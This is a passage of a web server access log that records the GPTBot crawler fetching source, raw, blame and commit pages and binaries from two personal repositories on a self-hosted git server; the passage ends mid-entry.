"/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 71999] [Gzip 10.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 66201] [Gzip 10.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:59:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_docker.tar.gz" +[17/Feb/2026:13:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" [Client 74.7.227.38] [Length 17667] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/asset_pilot_orangepi.tar.gz" +[17/Feb/2026:13:59:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject" +[17/Feb/2026:13:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" [Client 74.7.227.38] [Length 12043] [Gzip 3.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" +[17/Feb/2026:13:59:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:13:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:13:59:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 19732] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:13:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:13:59:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build" +[17/Feb/2026:13:59:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:13:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" [Client 74.7.227.38] [Length 9898] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest" +[17/Feb/2026:13:59:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" [Client 74.7.227.38] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest" +[17/Feb/2026:13:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor" [Client 74.7.227.38] [Length 14482] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:59:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/main.cpp" +[17/Feb/2026:13:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" [Client 74.7.227.38] [Length 9938] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" [Client 74.7.227.38] [Length 9848] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18039] [Gzip 5.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11755] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" +[17/Feb/2026:13:59:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" +[17/Feb/2026:13:59:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 10793] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 10793] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" [Client 74.7.227.38] [Length 9908] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/README.md" +[17/Feb/2026:13:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/README.md" +[17/Feb/2026:13:59:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 10754] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:13:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" [Client 74.7.227.38] [Length 9846] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist" +[17/Feb/2026:13:59:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" +[17/Feb/2026:13:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 6846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:13:59:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 423] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:13:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/storage.py" +[17/Feb/2026:13:59:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/notifier.py" +[17/Feb/2026:13:59:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 44945749] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9451] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9863] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9859] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9858] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.exe" +[17/Feb/2026:14:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 12196] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:00:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 12156] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot" +[17/Feb/2026:14:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" [Client 74.7.227.38] [Length 9457] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.exe" +[17/Feb/2026:14:00:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:00:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 283414] [Gzip 11.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" +[17/Feb/2026:14:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" +[17/Feb/2026:14:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/main.py" +[17/Feb/2026:14:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" [Client 74.7.227.38] [Length 22470] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/main.py" +[17/Feb/2026:14:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10626] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" +[17/Feb/2026:14:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10618] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build" +[17/Feb/2026:14:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" [Client 74.7.227.38] [Length 692] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/AssetPilot.spec" +[17/Feb/2026:14:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 9864] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" [Client 74.7.227.38] [Length 664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/GoldMonitor.spec" +[17/Feb/2026:14:00:14 +0000] - 200 200 - GET https 